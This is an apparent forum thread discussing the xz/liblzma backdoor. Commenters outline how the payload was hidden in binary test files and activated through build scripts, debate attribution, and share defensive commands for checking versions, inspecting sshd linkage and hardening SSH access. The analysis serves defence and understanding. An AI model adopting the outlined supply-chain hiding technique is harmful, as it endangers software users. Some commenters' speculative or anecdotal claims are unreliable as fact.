OpenSSH signatures in general contain the signer's public key, which I personally think is not weird but rather cool, since it allows verifying the signature without out-of-band key delivery (which OpenPGP requires). The authentication of the public key is a separate subject, but at least some basic checks can be done with an OpenSSH signature alone.
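For example, because the key rides along with the signature, you can at least check that a signature is internally valid before deciding whether to trust the signer. A rough sketch (`file`, `file.sig`, the namespace, and the signer identity are placeholders):
```
# Check the signature is cryptographically valid using the embedded key,
# without yet deciding whether you trust that key:
ssh-keygen -Y check-novalidate -n file -s file.sig < file
# Full verification still needs an allowed_signers file (the out-of-band part):
ssh-keygen -Y verify -f allowed_signers -I signer@example.com \
  -n file -s file.sig < file
```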
> cool since it allows verifying the signature without out-of-band key delivery
Hope you do key selection sanitization instead of the default (nobody does); otherwise you're offering random keys you have lying around (like your GitHub one) when logging in to secret.example.com.
Your SSH public keys used on GitHub are very publicly exposed.
This information could be used by SSH servers you are connecting to. You might think you are connecting anonymously, while in fact your SSH client is sending your public key which could then be resolved to your GitHub account.
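For what it's worth, the usual mitigation is to stop the client from offering every key it knows about. A minimal ~/.ssh/config sketch (host names and key paths are placeholders):
```
# Only offer keys explicitly configured for a host, never everything in the agent.
Host *
    IdentitiesOnly yes

Host github.com
    IdentityFile ~/.ssh/id_ed25519_github

Host secret.example.com
    IdentityFile ~/.ssh/id_ed25519_secret
```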
Lucky the XZ license switched from "Public Domain" to 0BSD in February (just before these 5.6.0 and 5.6.1 releases)!
0BSD has no clauses, but it does have this:
> IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
Uh, what would be his charge? I cannot fathom how, and based on what, he would be charged. Maybe this is an American thing, but he's not a US citizen to start with.
If I'm reading this right, would there be any persistent evidence of the executed payload? I can't think of a reason anything would have to go to disk in this situation, so a compromise could easily look like an auth failure in the logs... maybe a difference in timings... but that's about it.
Unless the payload did something that produced evidence, or if the program using openssl that was affected was, for some reason, having all of its actions logged, then no, probably not.
git.tukaani.org runs sshd. If that sshd was upgraded with the xz backdoor, we cannot exclude that the host was compromised, as it could have been an obvious target for the backdoor author.
And it's kind of smart to attack a compression library - you have plausible deniability for these opaque binary blobs - they are supposedly test cases, but in reality encode parts of the backdoor.
God the amount of damage this would've caused, nightmarish, we are so unbelievably lucky. In a few months it would've been in every deb&rpm distribution. Thank God we found it early!
I found the backdoor on five of my Vultr servers as well as my MacBook Pro this evening. I certainly didn’t catch it early.
So if that’s the state of it, it could very well be too late for many many companies. Not to mention folks who rely on TOR for their safety - there could be entire chains of backdoored entry, middle and exit nodes exposing vast numbers of TOR users over the past month or so (spies included!).
It was only in rolling-release/testing/unstable distributions, a pretty small subset of systems in the grand scheme of things, which is why I said that. It was introduced in the February 23 release of xz. It could have been years until this was discovered.
Never use unstable/testing on real servers, that's a bad idea for entirely different reasons.
Homebrew had updated to the backdoored version, so although it doesn't appear to trigger on macOS, you should update things to 'upgrade' from 5.6.1 to 5.4.6.
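If you're on Homebrew and want to see where you stand, something along these lines should do it (a sketch; 5.4.6 is the rebuilt version mentioned above):
```
brew info xz            # shows the installed version; 5.6.0/5.6.1 are the bad ones
brew update && brew upgrade xz
```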
Does anyone know if a honeypot has been set up for this?
In the event that exploit code has already been deployed, while these exploit attempts should now thankfully be futile, is there any valuable information that can be gained about the network sources of these exploit attempts?
We might assume that since this attack was foiled, exploit attempts won't happen, but if this is an automated botnet project, there may already be other operational elements in the wild that are knocking?
It's possible that there is an infection detection component to the project which is already measuring baseline accessibility, possibly using this and several alternate vectors. After all, effort was made to evade exploit attempt detection which would enable valuable active monitoring since it shouldn't trigger suspicions.
Maybe their organisation has a policy that requires stronger encryption? Possibly because that organisation is also in the business of cracking such encryption...
Qualitatively, 2^128 is already computationally infeasible (barring some advance in quantum computing), so the meaningful difference in security is debatable, assuming no weaknesses in the underlying curve.
Arch Linux uses a native/unpatched version of OpenSSH without dependency on libsystemd and thus without dependency on xz-utils, resulting in no exploitable code path. This means that at least the currently talked about vulnerability/exploit via SSH did presumably not work on Arch. Disclaimer: This is my understanding of the currently circulating facts. Additional fallout might be possible, as the reverse engineering of the backdoor is ongoing.
Just to extend the sibling comment with an excerpt of the Arch announce mail regarding the backdoor:
>From the upstream report [1]:
> openssh does not directly use liblzma. However debian and several other distributions patch openssh to support systemd notification, and libsystemd does depend on lzma.
Arch does not directly link openssh to liblzma, and thus this attack vector is not possible. You can confirm this by issuing the following command:
```
ldd "$(command -v sshd)"
```
However, out of an abundance of caution, we advise users to remove the malicious code from their system by upgrading either way. This is because other yet-to-be discovered methods to exploit the backdoor could exist.
I think they added it in parts over the course of a year or two, with each part being plausibly innocent-looking: First some testing infrastructure, some test cases with binary test data to test compression, updates to the build scripts – and then some updates to those existing binary files to put the obfuscated payload in place, modifications to the build scripts to activate it, etc.
That thread has become an online event and obviously lost its original constructive purpose the moment the malicious intent became public. The commenters are not trying to alter history; they're leaving their mark on a historic moment. I mean, the "lgtm" aged like milk, and the emoji reactions are pretty funny commentary.
Did the artefact produced [0] for fuzzing even include the backdoored .so? My understanding was that the compromised build scripts had measures to only run when producing debs/rpms.
The headline seems like a distinction without a difference. Bypassing ssh auth means getting a root shell. There is no significant difference between that and running system(). At most maybe system() has less logging.
My sense was this backdoor gets to execute whatever it wants using whatever "user" sshd is running as. So even if root logins are disabled, this backdoor doesn't care.
We basically need to analyse dependencies used in critical code paths (e.g. network attached services like sshd) and then start a process to add more rigorous controls around them. Some kind of enhanced scrutiny, certification and governance instead of relying on repos with individual maintainers and no meaningful code reviews, branch protection, etc.
And by we I mean at international/governmental level. Free software needs to stop being $free.
Society needs to start paying for the critical foundations upon which we all stand.
It was just that it hooks `RSA_public_decrypt`, which threw me off; I didn't really understand this backdoor much. I only have one Debian sid machine that was vulnerable and accessible via a public IPv4 SSH, and I'm not sure if I should just wipe it.
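For a Debian sid box like that, a quick sketch of what to look at (package name and the grep are just the obvious checks, not a full forensic answer):
```
dpkg -s liblzma5 | grep '^Version'       # 5.6.0/5.6.1-based packages are the bad ones
ldd "$(command -v sshd)" | grep -i lzma  # is liblzma mapped into sshd at all?
```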
If the RCE is Russian, it could be used as a communication kill-switch on the morning of an attack outside Ukraine, similar to the Viasat hack https://en.m.wikipedia.org/wiki/Viasat_hack
Why would being Russian make it this? It could be used that way if it was made in any country. They did this kind of attack once, okay? But it's not like other countries don't pay attention.
My suggestion: Put your SSH behind WireGuard and/or behind a jump host (with only port forwarding allowed, no shell). If you don’t have a separate host, use a Docker container.
If you use a jump host, consider a different OS (e.g., BSD vs Linux). Remember the analogy with slices of Swiss cheese used during the pandemic? If one slice has a hole, the next slice hopefully won't have a hole in the same position. The more slices you have, the better for you.
Although for remote management, you don’t want to have too many “slices” you have to manage and that can fail.
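For the jump-host option mentioned above, a rough sshd_config sketch for the jump box (the "jump" user, the internal host, and the nologin path are placeholders; this is one way to allow forwarding but no shell):
```
# sshd_config on the jump host: the "jump" account can only forward one port.
Match User jump
    PermitTTY no
    X11Forwarding no
    AllowAgentForwarding no
    AllowTcpForwarding yes
    PermitOpen internal.example.com:22
    ForceCommand /usr/sbin/nologin
```
Clients would then reach the inner host with something like `ssh -J jump@bastion user@internal.example.com`.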
As a matter of routine, I would advise that publicly reachable boxes be configured to accept connections only from whitelisted sources, and to do that at the lowest possible level of the stack. That's usually how secure environments, such as those used in PCI-compliant topologies, are specified.
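As a concrete example of "lowest possible level", a minimal nftables sketch (the management prefix is a placeholder, and it assumes an `inet filter` table with an `input` chain already exists):
```
# Only accept SSH from the management network; drop everyone else.
nft add rule inet filter input tcp dport 22 ip saddr 192.0.2.0/24 accept
nft add rule inet filter input tcp dport 22 drop
```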
Right now, nothing. The issue didn’t reach mainstream builds except nightly Red Hat and Fedora 41. The xz version affected has already been pulled and won’t be included in any future software versions.
Whilst we are in this speculative mode: what happens if a state actor wants to harm open source... not to destroy it but to pollute it? As was said, you can check and test it all. As for legal consequences... they do not care.
I wonder.
It's the "we are all good" versus "even Buddha has an evil nature" mental model.
Downvoted for asking a valid question? Or is every reader of every HN post expected to be an in-depth expert on every article posted every minute of every day of the year? What kind of asshole who has earned the right to downvote comments on HN would downvote a legitimate question?
My first instinct would be no, as WireGuard runs in kernel space (if you're using kernel WireGuard, not wireguard-go or some other userspace implementation), and couldn't link in liblzma, a userspace component.
I don't think that's what OP is asking. I think OP is asking if wireguard functions could be hooked in the same way as sshd functions are in this exploit.
Well, yes, I can, but unlike ssh which is open to the world, my VPN is only open to me and the family. It seems like that greatly reduces the potential attack surface.
A subsequent investigation found that the backdoor was a culmination of approximately 3 years of effort by a user going by the name Jia Tan and the nickname JiaT75, who appears to have made a concentrated effort to gain access to a position of trust within the xz project, by putting pressure on the head maintainer to step down and hand over the control of the project.[3]
One of the takeaways from this to me is that there is way too much sketchy bullshit happening in critical system software. Prebuilt binary blobs [1]? Rewriting calls to SIMD enhanced versions at runtime [2]? Disabling sanitizers [3]? Incomprehensible build scripts [4]?
All of this was either at least strongly frowned upon, if not outright unacceptable, on every project I've ever worked on, either professionally or for fun. And the stakes were far lower for those projects than critical linux system software.
My understanding is that the binary blobs were test data. Find a bug that happens on certain input. Craft a payload that both triggers the bug and does the malicious thing you want to do. Add the binary blob to /tests/files/. Then write a legitimate test to ensure that the bug goes away.
Then do some build script bullshit to somehow get that binary into the build.
> Rewriting calls to SIMD enhanced versions at runtime?
That's something that's been done for decades. It's pretty normal. What's not normal is for that to get re-done after startup. That is, one library should not be able to get that resolution process to be re-done after it's been done once. Malicious code that knows the run-time linker-loader's data structures could still re-resolve things anyways, which means that even removing this feature altogether from the run-time linker-loader wouldn't prevent this particular aspect of this attack.
I have found it irritating how in the community, in recent years, it's popular to say that if a project doesn't have recent commits or releases that something is seriously wrong. This is a toxic attitude. There was nothing wrong with "unmaintained" lzma two years ago. The math of the lzma algorithm doesn't change. The library was "done" and that's ok. The whiny mailing list post from the sock puppet, complaining about the lack of speedy releases, which was little more than ad hominem attacks on the part time maintainer, is all too typical and we shouldn't assume those people are "right" or have any validity to their opinion.
> The math of the lzma algorithm doesn't change. The library was "done" and that's ok.
Playing devil's advocate: the math doesn't change, but the environment around it does. Just off the top of my head, we have: the 32-bit to 64-bit transition, the removal of pre-C89 support (https://fedoraproject.org/wiki/Changes/PortingToModernC) which requires an autotools update, the periodic tightening of undefined behaviors, new architectures like RISC-V, the increasing amount of cores and a slowdown in the increase of per-core speed, the periodic release of new and exciting vector instructions, and exotic security features like CHERI which require more care with things like pointer provenance.
Actually, the new architectures are a big source of concern. As a maintainer of a large open source project, I often received pull requests for CPU architectures that I never had a chance to touch. Therefore I cannot build the code, cannot run the tests, and do not understand most of the code. C/C++ themselves are portable, but libs like xz need to beat the other competitors on performance, which means you may need to use model-specific SIMD instructions, query CPU cache size and topology, and work at a very low level. That code is not portable. When people add such code, they often need to add some tests, disable some existing tests conditionally, or tweak the build scripts. Those are all risks.
No matter how smart you are, you cannot forecast the future. Many CPUs now have a heterogeneous configuration, meaning they have big cores and little cores. But do all the cores have the same capabilities? Is it possible that a CPU instruction is only available on some of the cores? What does that mean for a multithreaded application? Could 64-bit CPUs drop support for 32-bit at the hardware level? Ten years ago you could not have predicted what is happening today.
Windows has a large compatibility layer, which allows you to run old code on the latest hardware and the latest Windows. It takes quite a lot of effort. Many applications would crash without the compatibility patches.
I am a former MS employee, I used to read the compatibility patches when I was bored at the office.
Anyway, liblzma does not "need" to outperform any "competition". If someone wants to work on some performance optimization, it's completely fair to fork. Look at how many performance oriented forks there are of libjpeg. The vanilla libjpeg still works.
and then that fork becomes more performant or feature rich or secure or (etc), and it becomes preferred over the original code base, and all distributions switch to it, and we're back at square one.
Excellent point. I believe that's coming from corporate supply-chain-attack "response": their insistence on making hard rules about "currency" and "activity" and "is maintained" pushes this kind of crap.
> (Random user or sock puppet) Is XZ for Java still maintained?
> (Lasse) I haven't lost interest but my ability to care has been fairly limited mostly due to ...
> (Lasse) Recently I've worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we'll see. It's also good to keep in mind that this is an unpaid hobby project
With a few years' worth of work by a team of 2-3 people: one writes and understands the code, one communicates, a few others pretend to be random users submitting ifunc patches, etc., you can end up controlling the project and signing releases.
I mostly agree with you, but I think your argument is wrong. Last month I found a tiny bug in Unix's fgrep program (the bug poses no risk). The program implements the Aho-Corasick algorithm, which hasn't changed much over decades. However, at least as of when the code was released in 4.4BSD, the bug still existed. It is not much of a concern, as nowadays most fgrep programs are just an alias of grep; they do not use the old Unix code anymore. The old Unix code, and much of FreeBSD, really couldn't meet today's security standards. For example, many text processing programs are vulnerable to DoS attacks when processing well-crafted input strings. I agree with you that in many cases we really don't need to touch the old code. However, it is not just because the algorithm didn't change.
A software project has the features it implements, the capabilities it offers users, and the boundary between itself and the environment in which those features create value for the user by becoming capabilities.
The "accounting" features in the source code may be finished and bug-free, but if the outside world has changed and now the user can't install the software, or it won't run on their system, or it's not compatible with other current software, then the software system doesn't grant the capability "accounting," even though the features are "finished."
Nothing with a boundary is ever finished. Boundaries just keep the outside world from coming in too fast to handle. If you don't maintain them then eventually the system will be overwhelmed and fail, a little at a time, or all at once.
I feel like this narrative is especially untrue for things like lzma where the only dependencies are memory and CPU, and written in a stable language like C. I've had similar experiences porting code for things like image formats, audio codecs, etc. where the interface is basically "decode this buffer into another buffer using math". In most cases you can plop that kind of library right in without any maintenance at all, it might be decades old, and it works. The type of maintenance I would expect for that would be around security holes. Once I patched an old library like that to handle the fact that the register keyword was deprecated.
C is not stable, and new CPU microarchitecture versions keep coming out from time to time. LZMA compression is not far from trivial; the trade-offs made back then might not be the most useful ones now, hence there are usually things that make sense to change even if the underlying math will be the same forever.
Sure, churn and make-believe maintenance for the sake of feeling good is harmful. (And that's where the larger community comes in: distributions, power users, etc. We need to help good maintainers and push back against bad ones. And yes, this is of course easier said than done.)
Smaller boundaries are likelier to need less maintenance, but nothing stands still. The reason you can run an ancient simple binary on newer systems is that someone has deliberately made that possible. People worked to make sure the environment around its boundary would stay the same instead of drifting randomly away with time—usually so doggedly (and thanklessly) that we can argue whether that stability was really a result of maintenance or just a fact of nature.
Two popular and well-tested Rust YAML libraries have recently been marked as unmaintained, and people are rushing to move away from them to brand-new projects because warnings went out about it.
> There was nothing wrong with "unmaintained" lzma two years ago.
Well, that's not exactly true. The first patch from Jia Tan is a minor documentation fix, and the second is a bugfix which, according to the commit message (by Collin), "breaks the decoder badly". There's a few more patches after that that fix real issues.
Mark Adler's zlib has been around for a lot longer than xz/liblzma, and there's still bugfixes to that, too.
> Libselinux pulls in liblzma too and gets linked into tons more programs than libsystemd. And will end up in sshd too (at the very least via libpam/pam_selinux). And most of the really big distros tend to support selinux at least to some level. Hence systemd or not, sshd remains vulnerable to this specific attack.
> The sshd in Devuan does link to a libsystemd stub - this is to cut down on their maintenance of upstream packages. However that stub does not link to lzma.
Stage 2 "extension" mechanism
This whole thing basically looks like an "extension/patching" system that would allow adding future scripts to be run in the context of Stage 2, without having to modify the original payload-carrying test files. Which makes sense, as modifying the "bad" and "good" test files over and over again would be pretty suspicious. So the plan seemed to be to just add new test files instead, which would have been picked up, deciphered, and executed.
I already felt like this was way too sophisticated for a random cybercriminal. It's not like making up fake internet identities is very difficult, but someone has pretended to be a good-faith contributor for ages, in a surprisingly long-term operation. You need some funding and a good reason to pull off something like that.
This could also be a ransomware group hoping to break into huge numbers of servers, though. Ransomware groups have been getting more sophisticated and they will already infiltrate their targets for months at a time (to make sure all old backups are useless when they strike), so I wouldn't put it past them to infiltrate the server authentication mechanism directly.
I don't know that they had a singular target necessarily. Much like Solarwinds, they could take their pick of thousands of targets if this had gone undetected.
I think we can all agree this attacker was sophisticated. But why would a government want to own tons of random Linux machines that have open sshd mappings? You have to expose sshd explicitly in most cloud environments (or on interesting networks worthy of attack.) Besides, the attacker must've known that if this is all over the internet eventually someone is going to notice.
I think the attacker had a target in mind. They were clearly focused on specific Linux distros. I'd imagine they were after a specific set of sshd bastion machine(s). Maybe they have the ability to get on the VPN that has access to the bastion(s) but the subset of users with actual bastion access is perhaps much smaller and more alert/less vulnerable to phishing.
So what's going to be the most valuable thing to hack that uses Linux sshd bastions? Something so valuable it's worth dedicating ~3 years of your life to it? My best guess is a crypto exchange.
> Something so valuable it's worth dedicating ~3 years of your life to it?
This isn't the right mindset if you want to consider a state actor, particularly for something like contributing to an open source project. It's not like you had to physically live your cover life while trying to infiltrate a company or something.
Yes, this is a lot of resources to spend, but at the same time, even dedicating one whole FTE for 3 years isn't that many resources. It's just salary at that point.
That still implies there was a target in mind. But also they would've had to assume the access would be relatively short-lived. This means to me they had something specific they wanted to get access to, didn't plan to be there long, and weren't terribly concerned about leaving a trail of their methods.
Why couldn't they have had 50 or 100 targets in mind, and hoped that the exploit would last for at least the month (or whatever) they needed to accomplish their multiple, unrelated goals?
I think your imagination is telling you a story that is prematurely limiting the range of real possibilities.
Governments have lots of money and time to spend, so having one more tool in the box for that single time you need to access a target where this works is an entirely reasonable investment. Would this, if it hadn't been used, have been noticed, possibly for years? That gives quite a lot of room to find a target for the times when it is needed.
And you could have multiple projects doing this type of work in parallel.
Seems to me they had perfectly good enough sock puppet accounts. It wasn't at all obvious they were sock puppets until someone detected the exploit.
I imagine such actors are embedded within major consumer tech teams, too: Twitter, TikTok, Chrome, Snap, WhatsApp, Instagram... which covers ~70% of all humanity.
This could be something that an agent who has infiltrated a company could use to execute things on internal hosts they have SSH connectivity to but no access on.
You could get into bastion hosts and then to PROD and leave no log traces.
What is the possibility of identity theft carried out at the state level? There are reports that the times the backdoor was pushed do not match the usual timing of changes committed by the author.
It also seems like convenient ground for a false-flag operation: hijacking an account that belongs to a trustworthy developer from another country.
I do not know why I read Golang issue threads. I always get angry at the we-know-better attitude. With just a dash of, "Well, that's not how Google does it. Why don't you just do better internally?"
I've seen a lot of discussion on the topic but have yet to see someone just specify which versions of xz are likely affected so that I can verify whether I'm running them or not ..
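For the record, the releases being pulled are xz/liblzma 5.6.0 and 5.6.1 (the same versions mentioned elsewhere in this thread). A quick sketch of how to check where you stand:
```
xz --version                             # bad if it reports 5.6.0 or 5.6.1
ldd "$(command -v sshd)" | grep -i lzma  # does liblzma even reach sshd on this box?
```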
It just seems implausible that the malicious x86 code would not have shown up in strace, perf record, or some backtrace. Once this ended up in all the major distros, some syscall or glibc call would have eventually looked like a red flag to someone before long.
What I'd like to understand is: has it been proven intentional?
My understanding is it was a few added characters in a header file. I can’t tell you the number of times I was tired and clicked an extra key before committing, or my cat walked across the keyboard while I was out of the room.
You should read up on the attack. The few characters were part of avoiding a specific case of detection. The back door is very large, is only added during tar build, and happens to only work when a special key is presented.
That's not an explanation of exactly how intent was derived.
I suppose I'm asking for the chain of events that led to the conclusion. I see lots of technical hot takes on how something could work, with no validation that it does, nor of the intent behind it.
I’d like to understand what steps we know were taken and how that presents itself.
It was a few added characters in a header file to make it possible to deliver the actual payload: 80+ kilobytes of machine code. There's no way to actually tell, but I'd estimate the malware source code to be O(10000) lines in C.
It's actually pretty sophisticated. You don't accidentally write an in-memory ELF program header parser.
I think their problem with open source is more that they can't have complete control and make every user's decision for them, security is just a nice tag along to that.
Maybe we should consider moving more and more system processes to WebAssembly. wasmtime has a nice sandbox. Surely it will decrease performance, but performance is not always that important. For example, on my dev machine, even if sshd's or Apache's performance dropped 3x because of that, I wouldn't mind. If I really cared, I'd spend more money on a more powerful CPU.
https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9...
Full list of decoded strings here:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01
--
For someone unfamiliar with openssl's internals (like me): The N value, I presume, is pulled from the `n` field of `rsa_st`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which is a `BIGNUM`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which appears to be a variable length type.